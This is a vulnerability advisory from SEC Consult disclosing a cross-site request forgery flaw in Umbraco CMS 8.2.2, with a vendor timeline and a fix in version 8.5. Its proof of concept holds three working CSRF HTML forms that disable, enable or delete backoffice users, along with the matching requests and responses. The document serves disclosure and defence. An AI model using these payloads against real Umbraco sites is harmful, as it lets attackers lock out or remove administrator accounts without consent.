SEC Consult Vulnerability Lab Security Advisory < 20200123-0 >
=======================================================================
              title: Cross-Site Request Forgery (CSRF)
            product: Umbraco CMS
 vulnerable version: version 8.2.2
      fixed version: version 8.5
         CVE number: CVE-2020-7210
             impact: medium
           homepage: https://umbraco.com/
              found: October 2019
                 by: A. Melnikova (Office Moscow)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest and best
version of Umbraco and a big step forward in regard to making your work
with Umbraco simpler; simpler to extend, simpler to edit, simpler to
publish - simpler to use, simpler to enjoy."

Source: https://umbraco.com/products/umbraco-cms/umbraco-8/


Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF)
An attacker can use cross-site request forgery to perform arbitrary web
requests with the identity of the victim, without being noticed by the
victim. This attack always requires some sort of user interaction, usually
the victim needs to click on an attacker-prepared link or visit a page
under control of the attacker. Due to this, an attacker is able to
enable/disable or delete accounts. This may lead to DoS of user accounts.


Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF)
In a live attack scenario, the following HTML document would be hosted
on a malicious website, controlled by the attacker.

Example 1: HTML-code for disabling user:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID>" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID> HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>


Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 112
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: <ADMIN-COOKIE>
Date: Wed, 06 Nov 2019 10:57:45 GMT
Connection: close

)]}',
{"notifications":[{"header":"<USERNAME> is now disabled","message":"","type":3}],"message":"<USERNAME> is now disabled"}


Example 2: HTML-code for enabling user:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID>" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID> HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>


Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 110
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Nov 2019 10:58:12 GMT
Connection: close

)]}',
{"notifications":[{"header":"<USERNAME> is now enabled","message":"","type":3}],"message":"<USERNAME> is now enabled"}


Example 3: HTML-code for deleting user:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID>" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID> HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>


Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 114
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: <ADMIN-COOKIE>
Date: Wed, 06 Nov 2019 10:58:36 GMT
Connection: close

)]}',
{"notifications":[{"header":"User <USERNAME> was deleted","message":"","type":3}],"message":"User <USERNAME> was deleted"}


As soon as an authenticated victim (admin) visits a website with this HTML code
embedded, the payload would get executed in the context of the victim's
session. Although responses to these requests are not delivered to the
attacker, in many cases it is sufficient to be able to compromise the
integrity of the victim's information stored on the site or to perform
certain, possibly compromising requests to other sites.



Vulnerable / tested versions:
-----------------------------
The following version was tested and found to be vulnerable:
* version 8.2.2


Vendor contact timeline:
------------------------
2019-11-13: Contacting vendor through security@umbraco.com.
2019-11-13: Requesting encryption keys.
2019-11-14: Encryption issues.
2019-11-15: Encryption issues, sending advisory in unencrypted form.
2019-11-25: No response, requesting status update.
2019-11-28: Vendor confirmed vulnerability.
2020-01-03: Confirming the release date.
2020-01-14: Release of updated CMS version 8.5.0.
2020-01-23: Release of security advisory.


Solution:
---------
The vendor provides an updated version which should be installed immediately:
https://our.umbraco.com/download/releases/850


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF A. Melnikova / @2020